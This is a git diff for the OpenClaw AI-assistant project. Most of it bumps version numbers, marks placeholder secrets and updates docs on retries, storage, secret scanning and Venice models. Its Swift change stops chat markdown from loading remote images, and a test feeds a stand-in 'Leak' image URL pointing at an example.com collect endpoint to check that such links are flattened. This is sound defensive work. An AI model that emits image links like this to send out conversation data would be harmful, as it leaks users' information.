+++ b/apps/ios/ShareExtension/Info.plist @@ -17,9 +17,9 @@ CFBundlePackageType XPC! CFBundleShortVersionString - 2026.3.2 + 2026.3.7 CFBundleVersion - 20260301 + 20260307 NSExtension NSExtensionAttributes diff --git a/apps/ios/Sources/Gateway/GatewaySettingsStore.swift b/apps/ios/Sources/Gateway/GatewaySettingsStore.swift index e467659a451..d91d2217741 100644 --- a/apps/ios/Sources/Gateway/GatewaySettingsStore.swift +++ b/apps/ios/Sources/Gateway/GatewaySettingsStore.swift @@ -26,7 +26,7 @@ enum GatewaySettingsStore { private static let preferredGatewayStableIDAccount = "preferredStableID" private static let lastDiscoveredGatewayStableIDAccount = "lastDiscoveredStableID" private static let lastGatewayConnectionAccount = "lastConnection" - private static let talkProviderApiKeyAccountPrefix = "provider.apiKey." + private static let talkProviderApiKeyAccountPrefix = "provider.apiKey." // pragma: allowlist secret static func bootstrapPersistence() { self.ensureStableInstanceID() diff --git a/apps/ios/Sources/Info.plist b/apps/ios/Sources/Info.plist index b4d6ed3109a..00f7f48029f 100644 --- a/apps/ios/Sources/Info.plist +++ b/apps/ios/Sources/Info.plist @@ -19,7 +19,7 @@ CFBundlePackageType APPL CFBundleShortVersionString - 2026.3.2 + 2026.3.7 CFBundleURLTypes @@ -32,7 +32,7 @@ CFBundleVersion - 20260301 + 20260307 NSAppTransportSecurity NSAllowsArbitraryLoadsInWebContent diff --git a/apps/ios/Tests/Info.plist b/apps/ios/Tests/Info.plist index 51f99d987c4..a2cb4ee4ef3 100644 --- a/apps/ios/Tests/Info.plist +++ b/apps/ios/Tests/Info.plist @@ -17,8 +17,8 @@ CFBundlePackageType BNDL CFBundleShortVersionString - 2026.3.2 + 2026.3.7 CFBundleVersion - 20260301 + 20260307 diff --git a/apps/ios/Tests/TalkModeConfigParsingTests.swift b/apps/ios/Tests/TalkModeConfigParsingTests.swift index a09f095a233..dc4a29548e0 100644 --- a/apps/ios/Tests/TalkModeConfigParsingTests.swift +++ b/apps/ios/Tests/TalkModeConfigParsingTests.swift @@ -23,7 +23,7 @@ import Testing @Test func ignoresLegacyTalkFieldsWhenNormalizedPayloadMissing() { let talk: [String: Any] = [ "voiceId": "voice-legacy", - "apiKey": "legacy-key", + "apiKey": "legacy-key", // pragma: allowlist secret ] let selection = TalkModeManager.selectTalkProviderConfig(talk) diff --git a/apps/ios/WatchApp/Info.plist b/apps/ios/WatchApp/Info.plist index c0041b2a11d..34d82764495 100644 --- a/apps/ios/WatchApp/Info.plist +++ b/apps/ios/WatchApp/Info.plist @@ -17,9 +17,9 @@ CFBundlePackageType APPL CFBundleShortVersionString - 2026.3.2 + 2026.3.7 CFBundleVersion - 20260301 + 20260307 WKCompanionAppBundleIdentifier $(OPENCLAW_APP_BUNDLE_ID) WKWatchKitApp diff --git a/apps/ios/WatchExtension/Info.plist b/apps/ios/WatchExtension/Info.plist index 45029fa7569..b3df595faeb 100644 --- a/apps/ios/WatchExtension/Info.plist +++ b/apps/ios/WatchExtension/Info.plist @@ -15,9 +15,9 @@ CFBundleName $(PRODUCT_NAME) CFBundleShortVersionString - 2026.3.2 + 2026.3.7 CFBundleVersion - 20260301 + 20260307 NSExtension NSExtensionAttributes diff --git a/apps/ios/project.yml b/apps/ios/project.yml index 3cc4444ce09..a0a7a500998 100644 --- a/apps/ios/project.yml +++ b/apps/ios/project.yml @@ -98,8 +98,8 @@ targets: - CFBundleURLName: ai.openclaw.ios CFBundleURLSchemes: - openclaw - CFBundleShortVersionString: "2026.3.2" - CFBundleVersion: "20260301" + CFBundleShortVersionString: "2026.3.7" + CFBundleVersion: "20260307" UILaunchScreen: {} UIApplicationSceneManifest: UIApplicationSupportsMultipleScenes: false @@ -156,8 +156,8 @@ targets: path: ShareExtension/Info.plist properties: CFBundleDisplayName: OpenClaw Share - CFBundleShortVersionString: "2026.3.2" - CFBundleVersion: "20260301" + CFBundleShortVersionString: "2026.3.7" + CFBundleVersion: "20260307" NSExtension: NSExtensionPointIdentifier: com.apple.share-services NSExtensionPrincipalClass: "$(PRODUCT_MODULE_NAME).ShareViewController" @@ -193,8 +193,8 @@ targets: path: ActivityWidget/Info.plist properties: CFBundleDisplayName: OpenClaw Activity - CFBundleShortVersionString: "2026.3.2" - CFBundleVersion: "20260301" + CFBundleShortVersionString: "2026.3.7" + CFBundleVersion: "20260307" NSSupportsLiveActivities: true NSExtension: NSExtensionPointIdentifier: com.apple.widgetkit-extension @@ -219,8 +219,8 @@ targets: path: WatchApp/Info.plist properties: CFBundleDisplayName: OpenClaw - CFBundleShortVersionString: "2026.3.2" - CFBundleVersion: "20260301" + CFBundleShortVersionString: "2026.3.7" + CFBundleVersion: "20260307" WKCompanionAppBundleIdentifier: "$(OPENCLAW_APP_BUNDLE_ID)" WKWatchKitApp: true @@ -244,8 +244,8 @@ targets: path: WatchExtension/Info.plist properties: CFBundleDisplayName: OpenClaw - CFBundleShortVersionString: "2026.3.2" - CFBundleVersion: "20260301" + CFBundleShortVersionString: "2026.3.7" + CFBundleVersion: "20260307" NSExtension: NSExtensionAttributes: WKAppBundleIdentifier: "$(OPENCLAW_WATCH_APP_BUNDLE_ID)" @@ -279,5 +279,5 @@ targets: path: Tests/Info.plist properties: CFBundleDisplayName: OpenClawTests - CFBundleShortVersionString: "2026.3.2" - CFBundleVersion: "20260301" + CFBundleShortVersionString: "2026.3.7" + CFBundleVersion: "20260307" diff --git a/apps/macos/Sources/OpenClaw/Resources/Info.plist b/apps/macos/Sources/OpenClaw/Resources/Info.plist index 8ca28de8bd6..42be1e819be 100644 --- a/apps/macos/Sources/OpenClaw/Resources/Info.plist +++ b/apps/macos/Sources/OpenClaw/Resources/Info.plist @@ -15,9 +15,9 @@ CFBundlePackageType APPL CFBundleShortVersionString - 2026.3.2 + 2026.3.7 CFBundleVersion - 202603010 + 202603070 CFBundleIconFile OpenClaw CFBundleURLTypes diff --git a/apps/shared/OpenClawKit/Sources/OpenClawChatUI/ChatMarkdownPreprocessor.swift b/apps/shared/OpenClawKit/Sources/OpenClawChatUI/ChatMarkdownPreprocessor.swift index 0b012586672..f03448140dc 100644 --- a/apps/shared/OpenClawKit/Sources/OpenClawChatUI/ChatMarkdownPreprocessor.swift +++ b/apps/shared/OpenClawKit/Sources/OpenClawChatUI/ChatMarkdownPreprocessor.swift @@ -13,6 +13,8 @@ enum ChatMarkdownPreprocessor { "Chat history since last reply (untrusted, for context):", ] + private static let markdownImagePattern = #"!\[([^\]]*)\]\(([^)]+)\)"# + struct InlineImage: Identifiable { let id = UUID() let label: String @@ -27,8 +29,7 @@ enum ChatMarkdownPreprocessor { static func preprocess(markdown raw: String) -> Result { let withoutContextBlocks = self.stripInboundContextBlocks(raw) let withoutTimestamps = self.stripPrefixedTimestamps(withoutContextBlocks) - let pattern = #"!\[([^\]]*)\]\((data:image\/[^;]+;base64,[^)]+)\)"# - guard let re = try? NSRegularExpression(pattern: pattern) else { + guard let re = try? NSRegularExpression(pattern: self.markdownImagePattern) else { return Result(cleaned: self.normalize(withoutTimestamps), images: []) } @@ -39,27 +40,42 @@ enum ChatMarkdownPreprocessor { if matches.isEmpty { return Result(cleaned: self.normalize(withoutTimestamps), images: []) } var images: [InlineImage] = [] - var cleaned = withoutTimestamps + let cleaned = NSMutableString(string: withoutTimestamps) for match in matches.reversed() { guard match.numberOfRanges >= 3 else { continue } let label = ns.substring(with: match.range(at: 1)) - let dataURL = ns.substring(with: match.range(at: 2)) + let source = ns.substring(with: match.range(at: 2)) - let image: OpenClawPlatformImage? = { - guard let comma = dataURL.firstIndex(of: ",") else { return nil } - let b64 = String(dataURL[dataURL.index(after: comma)...]) - guard let data = Data(base64Encoded: b64) else { return nil } - return OpenClawPlatformImage(data: data) - }() - images.append(InlineImage(label: label, image: image)) - - let start = cleaned.index(cleaned.startIndex, offsetBy: match.range.location) - let end = cleaned.index(start, offsetBy: match.range.length) - cleaned.replaceSubrange(start.. InlineImage? { + let trimmed = source.trimmingCharacters(in: .whitespacesAndNewlines) + guard let comma = trimmed.firstIndex(of: ","), + trimmed[.. String { + let trimmed = label.trimmingCharacters(in: .whitespacesAndNewlines) + return trimmed.isEmpty ? "image" : trimmed } private static func stripInboundContextBlocks(_ raw: String) -> String { diff --git a/apps/shared/OpenClawKit/Tests/OpenClawKitTests/ChatMarkdownPreprocessorTests.swift b/apps/shared/OpenClawKit/Tests/OpenClawKitTests/ChatMarkdownPreprocessorTests.swift index 781a325f3cf..576e821c1e8 100644 --- a/apps/shared/OpenClawKit/Tests/OpenClawKitTests/ChatMarkdownPreprocessorTests.swift +++ b/apps/shared/OpenClawKit/Tests/OpenClawKitTests/ChatMarkdownPreprocessorTests.swift @@ -18,6 +18,39 @@ struct ChatMarkdownPreprocessorTests { #expect(result.images.first?.image != nil) } + @Test func flattensRemoteMarkdownImagesIntoText() { + let base64 = "iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQIHWP4////GQAJ+wP/2hN8NwAAAABJRU5ErkJggg==" + let markdown = """ + ![Leak](https://example.com/collect?x=1) + + ![Pixel](data:image/png;base64,\(base64)) + """ + + let result = ChatMarkdownPreprocessor.preprocess(markdown: markdown) + + #expect(result.cleaned == "Leak") + #expect(result.images.count == 1) + #expect(result.images.first?.image != nil) + } + + @Test func usesFallbackTextForUnlabeledRemoteMarkdownImages() { + let markdown = "![](https://example.com/image.png)" + + let result = ChatMarkdownPreprocessor.preprocess(markdown: markdown) + + #expect(result.cleaned == "image") + #expect(result.images.isEmpty) + } + + @Test func handlesUnicodeBeforeRemoteMarkdownImages() { + let markdown = "🙂![Leak](https://example.com/image.png)" + + let result = ChatMarkdownPreprocessor.preprocess(markdown: markdown) + + #expect(result.cleaned == "🙂Leak") + #expect(result.images.isEmpty) + } + @Test func stripsInboundUntrustedContextBlocks() { let markdown = """ Conversation info (untrusted metadata): diff --git a/docs/automation/cron-jobs.md b/docs/automation/cron-jobs.md index 1421480a7a0..b0798898910 100644 --- a/docs/automation/cron-jobs.md +++ b/docs/automation/cron-jobs.md @@ -370,6 +370,7 @@ When a job fails, OpenClaw classifies errors as **transient** (retryable) or **p ### Transient errors (retried) - Rate limit (429, too many requests, resource exhausted) +- Provider overload (for example Anthropic `529 overloaded_error`, overload fallback summaries) - Network errors (timeout, ECONNRESET, fetch failed, socket) - Server errors (5xx) - Cloudflare-related errors @@ -407,7 +408,7 @@ Configure `cron.retry` to override these defaults (see [Configuration](/automati retry: { maxAttempts: 3, backoffMs: [60000, 120000, 300000], - retryOn: ["rate_limit", "network", "server_error"], + retryOn: ["rate_limit", "overloaded", "network", "server_error"], }, webhook: "https://example.invalid/legacy", // deprecated fallback for stored notify:true jobs webhookToken: "replace-with-dedicated-webhook-token", // optional bearer token for webhook mode @@ -665,7 +666,7 @@ openclaw system event --mode now --text "Next heartbeat: check battery." - OpenClaw applies exponential retry backoff for recurring jobs after consecutive errors: 30s, 1m, 5m, 15m, then 60m between retries. - Backoff resets automatically after the next successful run. -- One-shot (`at`) jobs retry transient errors (rate limit, network, server_error) up to 3 times with backoff; permanent errors disable immediately. See [Retry policy](/automation/cron-jobs#retry-policy). +- One-shot (`at`) jobs retry transient errors (rate limit, overloaded, network, server_error) up to 3 times with backoff; permanent errors disable immediately. See [Retry policy](/automation/cron-jobs#retry-policy). ### Telegram delivers to the wrong place diff --git a/docs/channels/telegram.md b/docs/channels/telegram.md index e975db4c357..e50590c8427 100644 --- a/docs/channels/telegram.md +++ b/docs/channels/telegram.md @@ -804,7 +804,7 @@ openclaw message poll --channel telegram --target -1001234567890:topic:42 \ ```yaml channels: telegram: - proxy: socks5://user:pass@proxy-host:1080 + proxy: socks5://:@proxy-host:1080 ``` - Node 22+ defaults to `autoSelectFamily=true` (except WSL2) and `dnsResultOrder=ipv4first`. diff --git a/docs/gateway/configuration-reference.md b/docs/gateway/configuration-reference.md index 30559b5d55d..749b0d2b261 100644 --- a/docs/gateway/configuration-reference.md +++ b/docs/gateway/configuration-reference.md @@ -1003,6 +1003,7 @@ Periodic heartbeat runs. reserveTokensFloor: 24000, identifierPolicy: "strict", // strict | off | custom identifierInstructions: "Preserve deployment IDs, ticket IDs, and host:port pairs exactly.", // used when identifierPolicy=custom + postCompactionSections: ["Session Startup", "Red Lines"], // [] disables reinjection memoryFlush: { enabled: true, softThresholdTokens: 6000, @@ -1018,6 +1019,7 @@ Periodic heartbeat runs. - `mode`: `default` or `safeguard` (chunked summarization for long histories). See [Compaction](/concepts/compaction). - `identifierPolicy`: `strict` (default), `off`, or `custom`. `strict` prepends built-in opaque identifier retention guidance during compaction summarization. - `identifierInstructions`: optional custom identifier-preservation text used when `identifierPolicy=custom`. +- `postCompactionSections`: optional AGENTS.md H2/H3 section names to re-inject after compaction. Defaults to `["Session Startup", "Red Lines"]`; set `[]` to disable reinjection. When unset or explicitly set to that default pair, older `Every Session`/`Safety` headings are also accepted as a legacy fallback. - `memoryFlush`: silent agentic turn before auto-compaction to store durable memories. Skipped when workspace is read-only. ### `agents.defaults.contextPruning` diff --git a/docs/gateway/openresponses-http-api.md b/docs/gateway/openresponses-http-api.md index b5b4045ac62..8b490b30632 100644 --- a/docs/gateway/openresponses-http-api.md +++ b/docs/gateway/openresponses-http-api.md @@ -161,7 +161,7 @@ Supports base64 or URL sources: } ``` -Allowed MIME types (current): `image/jpeg`, `image/png`, `image/gif`, `image/webp`. +Allowed MIME types (current): `image/jpeg`, `image/png`, `image/gif`, `image/webp`, `image/heic`, `image/heif`. Max size (current): 10MB. ## Files (`input_file`) diff --git a/docs/gateway/secrets.md b/docs/gateway/secrets.md index db4be160cd7..2956d53133e 100644 --- a/docs/gateway/secrets.md +++ b/docs/gateway/secrets.md @@ -179,8 +179,8 @@ Request payload (stdin): Response payload (stdout): -```json -{ "protocolVersion": 1, "values": { "providers/openai/apiKey": "sk-..." } } +```jsonc +{ "protocolVersion": 1, "values": { "providers/openai/apiKey": "" } } // pragma: allowlist secret ``` Optional per-id errors: diff --git a/docs/gateway/security/index.md b/docs/gateway/security/index.md index 4792b20c891..c62b77352e8 100644 --- a/docs/gateway/security/index.md +++ b/docs/gateway/security/index.md @@ -1158,19 +1158,22 @@ If your AI does something bad: ## Secret Scanning (detect-secrets) -CI runs `detect-secrets scan --baseline .secrets.baseline` in the `secrets` job. -If it fails, there are new candidates not yet in the baseline. +CI runs the `detect-secrets` pre-commit hook in the `secrets` job. +Pushes to `main` always run an all-files scan. Pull requests use a changed-file +fast path when a base commit is available, and fall back to an all-files scan +otherwise. If it fails, there are new candidates not yet in the baseline. ### If CI fails 1. Reproduce locally: ```bash - detect-secrets scan --baseline .secrets.baseline + pre-commit run --all-files detect-secrets ``` 2. Understand the tools: - - `detect-secrets scan` finds candidates and compares them to the baseline. + - `detect-secrets` in pre-commit runs `detect-secrets-hook` with the repo's + baseline and excludes. - `detect-secrets audit` opens an interactive review to mark each baseline item as real or false positive. 3. For real secrets: rotate/remove them, then re-run the scan to update the baseline. diff --git a/docs/index.md b/docs/index.md index 606ff4828e5..2821cb1c84f 100644 --- a/docs/index.md +++ b/docs/index.md @@ -124,7 +124,7 @@ Open the browser Control UI after the Gateway starts. - Remote access: [Web surfaces](/web) and [Tailscale](/gateway/tailscale)

- OpenClaw + OpenClaw

## Configuration (optional) diff --git a/docs/install/docker.md b/docs/install/docker.md index 8cbf2555e87..0eeacd63ffe 100644 --- a/docs/install/docker.md +++ b/docs/install/docker.md @@ -476,6 +476,10 @@ curl -fsS http://127.0.0.1:18789/readyz Aliases: `/health` and `/ready`. +`/healthz` is a shallow liveness probe for "the gateway process is up". +`/readyz` stays ready during startup grace, then becomes `503` only if required +managed channels are still disconnected after grace or disconnect later. + The Docker image includes a built-in `HEALTHCHECK` that pings `/healthz` in the background. In plain terms: Docker keeps checking if OpenClaw is still responsive. If checks keep failing, Docker marks the container as `unhealthy`, @@ -531,6 +535,12 @@ docker compose run --rm openclaw-cli devices list --url ws://127.0.0.1:18789 - Dockerfile CMD uses `--allow-unconfigured`; mounted config with `gateway.mode` not `local` will still start. Override CMD to enforce the guard. - The gateway container is the source of truth for sessions (`~/.openclaw/agents//sessions/`). +### Storage model + +- **Persistent host data:** Docker Compose bind-mounts `OPENCLAW_CONFIG_DIR` to `/home/node/.openclaw` and `OPENCLAW_WORKSPACE_DIR` to `/home/node/.openclaw/workspace`, so those paths survive container replacement. +- **Ephemeral sandbox tmpfs:** when `agents.defaults.sandbox` is enabled, the sandbox containers use `tmpfs` for `/tmp`, `/var/tmp`, and `/run`. Those mounts are separate from the top-level Compose stack and disappear with the sandbox container. +- **Disk growth hotspots:** watch `media/`, `agents//sessions/sessions.json`, transcript JSONL files, `cron/runs/*.jsonl`, and rolling file logs under `/tmp/openclaw/` (or your configured `logging.file`). If you also run the macOS app outside Docker, its service logs are separate again: `~/.openclaw/logs/gateway.log`, `~/.openclaw/logs/gateway.err.log`, and `/tmp/openclaw/openclaw-gateway.log`. + ## Agent Sandbox (host gateway + Docker tools) Deep dive: [Sandboxing](/gateway/sandboxing) diff --git a/docs/install/podman.md b/docs/install/podman.md index e753c82f32f..888bbc904b9 100644 --- a/docs/install/podman.md +++ b/docs/install/podman.md @@ -93,6 +93,14 @@ To add quadlet **after** an initial setup that did not use it, re-run: `./setup- - **Gateway bind:** By default, `run-openclaw-podman.sh` starts the gateway with `--bind loopback` for safe local access. To expose on LAN, set `OPENCLAW_GATEWAY_BIND=lan` and configure `gateway.controlUi.allowedOrigins` (or explicitly enable host-header fallback) in `openclaw.json`. - **Paths:** Host config and workspace default to `~openclaw/.openclaw` and `~openclaw/.openclaw/workspace`. Override the host paths used by the launch script with `OPENCLAW_CONFIG_DIR` and `OPENCLAW_WORKSPACE_DIR`. +## Storage model + +- **Persistent host data:** `OPENCLAW_CONFIG_DIR` and `OPENCLAW_WORKSPACE_DIR` are bind-mounted into the container and retain state on the host. +- **Ephemeral sandbox tmpfs:** if you enable `agents.defaults.sandbox`, the tool sandbox containers mount `tmpfs` at `/tmp`, `/var/tmp`, and `/run`. Those paths are memory-backed and disappear with the sandbox container; the top-level Podman container setup does not add its own tmpfs mounts. +- **Disk growth hotspots:** the main paths to watch are `media/`, `agents//sessions/sessions.json`, transcript JSONL files, `cron/runs/*.jsonl`, and rolling file logs under `/tmp/openclaw/` (or your configured `logging.file`). + +`setup-podman.sh` now stages the image tar in a private temp directory and prints the chosen base dir during setup. For non-root runs it accepts `TMPDIR` only when that base is safe to use; otherwise it falls back to `/var/tmp`, then `/tmp`. The saved tar stays owner-only and is streamed into the target user’s `podman load`, so private caller temp dirs do not block setup. + ## Useful commands - **Logs:** With quadlet: `sudo journalctl --machine openclaw@ --user -u openclaw.service -f`. With script: `sudo -u openclaw podman logs -f openclaw` diff --git a/docs/ja-JP/index.md b/docs/ja-JP/index.md index 63d83d74ab2..a47280c8dc2 100644 --- a/docs/ja-JP/index.md +++ b/docs/ja-JP/index.md @@ -118,7 +118,7 @@ Gatewayの起動後、ブラウザでControl UIを開きます。 - リモートアクセス: [Webサーフェス](/web)および[Tailscale](/gateway/tailscale)

- OpenClaw + OpenClaw

## 設定(オプション) diff --git a/docs/platforms/mac/release.md b/docs/platforms/mac/release.md index a71e2e8fe5e..597ce2d2570 100644 --- a/docs/platforms/mac/release.md +++ b/docs/platforms/mac/release.md @@ -37,16 +37,16 @@ Notes: # APP_BUILD must be numeric + monotonic for Sparkle compare. # Default is auto-derived from APP_VERSION when omitted. BUNDLE_ID=ai.openclaw.mac \ -APP_VERSION=2026.3.2 \ +APP_VERSION=2026.3.7 \ BUILD_CONFIG=release \ SIGN_IDENTITY="Developer ID Application: ()" \ scripts/package-mac-app.sh # Zip for distribution (includes resource forks for Sparkle delta support) -ditto -c -k --sequesterRsrc --keepParent dist/OpenClaw.app dist/OpenClaw-2026.3.2.zip +ditto -c -k --sequesterRsrc --keepParent dist/OpenClaw.app dist/OpenClaw-2026.3.7.zip # Optional: also build a styled DMG for humans (drag to /Applications) -scripts/create-dmg.sh dist/OpenClaw.app dist/OpenClaw-2026.3.2.dmg +scripts/create-dmg.sh dist/OpenClaw.app dist/OpenClaw-2026.3.7.dmg # Recommended: build + notarize/staple zip + DMG # First, create a keychain profile once: @@ -54,13 +54,13 @@ scripts/create-dmg.sh dist/OpenClaw.app dist/OpenClaw-2026.3.2.dmg # --apple-id "" --team-id "" --password "" NOTARIZE=1 NOTARYTOOL_PROFILE=openclaw-notary \ BUNDLE_ID=ai.openclaw.mac \ -APP_VERSION=2026.3.2 \ +APP_VERSION=2026.3.7 \ BUILD_CONFIG=release \ SIGN_IDENTITY="Developer ID Application: ()" \ scripts/package-mac-dist.sh # Optional: ship dSYM alongside the release -ditto -c -k --keepParent apps/macos/.build/release/OpenClaw.app.dSYM dist/OpenClaw-2026.3.2.dSYM.zip +ditto -c -k --keepParent apps/macos/.build/release/OpenClaw.app.dSYM dist/OpenClaw-2026.3.7.dSYM.zip ``` ## Appcast entry @@ -68,7 +68,7 @@ ditto -c -k --keepParent apps/macos/.build/release/OpenClaw.app.dSYM dist/OpenCl Use the release note generator so Sparkle renders formatted HTML notes: ```bash -SPARKLE_PRIVATE_KEY_FILE=/path/to/ed25519-private-key scripts/make_appcast.sh dist/OpenClaw-2026.3.2.zip https://raw.githubusercontent.com/openclaw/openclaw/main/appcast.xml +SPARKLE_PRIVATE_KEY_FILE=/path/to/ed25519-private-key scripts/make_appcast.sh dist/OpenClaw-2026.3.7.zip https://raw.githubusercontent.com/openclaw/openclaw/main/appcast.xml ``` Generates HTML release notes from `CHANGELOG.md` (via [`scripts/changelog-to-html.sh`](https://github.com/openclaw/openclaw/blob/main/scripts/changelog-to-html.sh)) and embeds them in the appcast entry. @@ -76,7 +76,7 @@ Commit the updated `appcast.xml` alongside the release assets (zip + dSYM) when ## Publish & verify -- Upload `OpenClaw-2026.3.2.zip` (and `OpenClaw-2026.3.2.dSYM.zip`) to the GitHub release for tag `v2026.3.2`. +- Upload `OpenClaw-2026.3.7.zip` (and `OpenClaw-2026.3.7.dSYM.zip`) to the GitHub release for tag `v2026.3.7`. - Ensure the raw appcast URL matches the baked feed: `https://raw.githubusercontent.com/openclaw/openclaw/main/appcast.xml`. - Sanity checks: - `curl -I https://raw.githubusercontent.com/openclaw/openclaw/main/appcast.xml` returns 200. diff --git a/docs/platforms/raspberry-pi.md b/docs/platforms/raspberry-pi.md index 79c9c34fd0d..e46076e869d 100644 --- a/docs/platforms/raspberry-pi.md +++ b/docs/platforms/raspberry-pi.md @@ -197,7 +197,7 @@ See [Pi USB boot guide](https://www.raspberrypi.com/documentation/computers/rasp On lower-power Pi hosts, enable Node's module compile cache so repeated CLI runs are faster: ```bash -grep -q 'NODE_COMPILE_CACHE=/var/tmp/openclaw-compile-cache' ~/.bashrc || cat >> ~/.bashrc <<'EOF' +grep -q 'NODE_COMPILE_CACHE=/var/tmp/openclaw-compile-cache' ~/.bashrc || cat >> ~/.bashrc <<'EOF' # pragma: allowlist secret export NODE_COMPILE_CACHE=/var/tmp/openclaw-compile-cache mkdir -p /var/tmp/openclaw-compile-cache export OPENCLAW_NO_RESPAWN=1 diff --git a/docs/providers/kilocode.md b/docs/providers/kilocode.md index 146e22932c4..009f4d83812 100644 --- a/docs/providers/kilocode.md +++ b/docs/providers/kilocode.md @@ -25,14 +25,14 @@ openclaw onboard --kilocode-api-key Or set the environment variable: ```bash -export KILOCODE_API_KEY="your-api-key" +export KILOCODE_API_KEY="" # pragma: allowlist secret ``` ## Config snippet ```json5 { - env: { KILOCODE_API_KEY: "sk-..." }, + env: { KILOCODE_API_KEY: "" }, // pragma: allowlist secret agents: { defaults: { model: { primary: "kilocode/anthropic/claude-opus-4.6" }, diff --git a/docs/providers/venice.md b/docs/providers/venice.md index 6517e9909b2..520cf22d82b 100644 --- a/docs/providers/venice.md +++ b/docs/providers/venice.md @@ -23,16 +23,16 @@ Venice AI provides privacy-focused AI inference with support for uncensored mode Venice offers two privacy levels — understanding this is key to choosing your model: -| Mode | Description | Models | -| -------------- | -------------------------------------------------------------------------------------------------------------------- | ---------------------------------------------- | -| **Private** | Fully private. Prompts/responses are **never stored or logged**. Ephemeral. | Llama, Qwen, DeepSeek, Venice Uncensored, etc. | -| **Anonymized** | Proxied through Venice with metadata stripped. The underlying provider (OpenAI, Anthropic) sees anonymized requests. | Claude, GPT, Gemini, Grok, Kimi, MiniMax | +| Mode | Description | Models | +| -------------- | --------------------------------------------------------------------------------------------------------------------------------- | ------------------------------------------------------------- | +| **Private** | Fully private. Prompts/responses are **never stored or logged**. Ephemeral. | Llama, Qwen, DeepSeek, Kimi, MiniMax, Venice Uncensored, etc. | +| **Anonymized** | Proxied through Venice with metadata stripped. The underlying provider (OpenAI, Anthropic, Google, xAI) sees anonymized requests. | Claude, GPT, Gemini, Grok | ## Features - **Privacy-focused**: Choose between "private" (fully private) and "anonymized" (proxied) modes - **Uncensored models**: Access to models without content restrictions -- **Major model access**: Use Claude, GPT-5.2, Gemini, Grok via Venice's anonymized proxy +- **Major model access**: Use Claude, GPT, Gemini, and Grok via Venice's anonymized proxy - **OpenAI-compatible API**: Standard `/v1` endpoints for easy integration - **Streaming**: ✅ Supported on all models - **Function calling**: ✅ Supported on select models (check model capabilities) @@ -79,23 +79,23 @@ openclaw onboard --non-interactive \ ### 3. Verify Setup ```bash -openclaw agent --model venice/llama-3.3-70b --message "Hello, are you working?" +openclaw agent --model venice/kimi-k2-5 --message "Hello, are you working?" ``` ## Model Selection After setup, OpenClaw shows all available Venice models. Pick based on your needs: -- **Default model**: `venice/llama-3.3-70b` for private, balanced performance. -- **High-capability option**: `venice/claude-opus-45` for hard jobs. +- **Default model**: `venice/kimi-k2-5` for strong private reasoning plus vision. +- **High-capability option**: `venice/claude-opus-4-6` for the strongest anonymized Venice path. - **Privacy**: Choose "private" models for fully private inference. - **Capability**: Choose "anonymized" models to access Claude, GPT, Gemini via Venice's proxy. Change your default model anytime: ```bash -openclaw models set venice/claude-opus-45 -openclaw models set venice/llama-3.3-70b +openclaw models set venice/kimi-k2-5 +openclaw models set venice/claude-opus-4-6 ``` List all available models: @@ -112,53 +112,68 @@ openclaw models list | grep venice ## Which Model Should I Use? -| Use Case | Recommended Model | Why | -| ---------------------------- | -------------------------------- | ----------------------------------- | -| **General chat** | `llama-3.3-70b` | Good all-around, fully private | -| **High-capability option** | `claude-opus-45` | Higher quality for hard tasks | -| **Privacy + Claude quality** | `claude-opus-45` | Best reasoning via anonymized proxy | -| **Coding** | `qwen3-coder-480b-a35b-instruct` | Code-optimized, 262k context | -| **Vision tasks** | `qwen3-vl-235b-a22b` | Best private vision model | -| **Uncensored** | `venice-uncensored` | No content restrictions | -| **Fast + cheap** | `qwen3-4b` | Lightweight, still capable | -| **Complex reasoning** | `deepseek-v3.2` | Strong reasoning, private | +| Use Case | Recommended Model | Why | +| -------------------------- | -------------------------------- | -------------------------------------------- | +| **General chat (default)** | `kimi-k2-5` | Strong private reasoning plus vision | +| **Best overall quality** | `claude-opus-4-6` | Strongest anonymized Venice option | +| **Privacy + coding** | `qwen3-coder-480b-a35b-instruct` | Private coding model with large context | +| **Private vision** | `kimi-k2-5` | Vision support without leaving private mode | +| **Fast + cheap** | `qwen3-4b` | Lightweight reasoning model | +| **Complex private tasks** | `deepseek-v3.2` | Strong reasoning, but no Venice tool support | +| **Uncensored** | `venice-uncensored` | No content restrictions | -## Available Models (25 Total) +## Available Models (41 Total) -### Private Models (15) — Fully Private, No Logging +### Private Models (26) — Fully Private, No Logging -| Model ID | Name | Context (tokens) | Features | -| -------------------------------- | ----------------------- | ---------------- | ----------------------- | -| `llama-3.3-70b` | Llama 3.3 70B | 131k | General | -| `llama-3.2-3b` | Llama 3.2 3B | 131k | Fast, lightweight | -| `hermes-3-llama-3.1-405b` | Hermes 3 Llama 3.1 405B | 131k | Complex tasks | -| `qwen3-235b-a22b-thinking-2507` | Qwen3 235B Thinking | 131k | Reasoning | -| `qwen3-235b-a22b-instruct-2507` | Qwen3 235B Instruct | 131k | General | -| `qwen3-coder-480b-a35b-instruct` | Qwen3 Coder 480B | 262k | Code | -| `qwen3-next-80b` | Qwen3 Next 80B | 262k | General | -| `qwen3-vl-235b-a22b` | Qwen3 VL 235B | 262k | Vision | -| `qwen3-4b` | Venice Small (Qwen3 4B) | 32k | Fast, reasoning | -| `deepseek-v3.2` | DeepSeek V3.2 | 163k | Reasoning | -| `venice-uncensored` | Venice Uncensored | 32k | Uncensored | -| `mistral-31-24b` | Venice Medium (Mistral) | 131k | Vision | -| `google-gemma-3-27b-it` | Gemma 3 27B Instruct | 202k | Vision | -| `openai-gpt-oss-120b` | OpenAI GPT OSS 120B | 131k | General | -| `zai-org-glm-4.7` | GLM 4.7 | 202k | Reasoning, multilingual | +| Model ID | Name | Context | Features | +| -------------------------------------- | ----------------------------------- | ------- | -------------------------- | +| `kimi-k2-5` | Kimi K2.5 | 256k | Default, reasoning, vision | +| `kimi-k2-thinking` | Kimi K2 Thinking | 256k | Reasoning | +| `llama-3.3-70b` | Llama 3.3 70B | 128k | General | +| `llama-3.2-3b` | Llama 3.2 3B | 128k | General | +| `hermes-3-llama-3.1-405b` | Hermes 3 Llama 3.1 405B | 128k | General, tools disabled | +| `qwen3-235b-a22b-thinking-2507` | Qwen3 235B Thinking | 128k | Reasoning | +| `qwen3-235b-a22b-instruct-2507` | Qwen3 235B Instruct | 128k | General | +| `qwen3-coder-480b-a35b-instruct` | Qwen3 Coder 480B | 256k | Coding | +| `qwen3-coder-480b-a35b-instruct-turbo` | Qwen3 Coder 480B Turbo | 256k | Coding | +| `qwen3-5-35b-a3b` | Qwen3.5 35B A3B | 256k | Reasoning, vision | +| `qwen3-next-80b` | Qwen3 Next 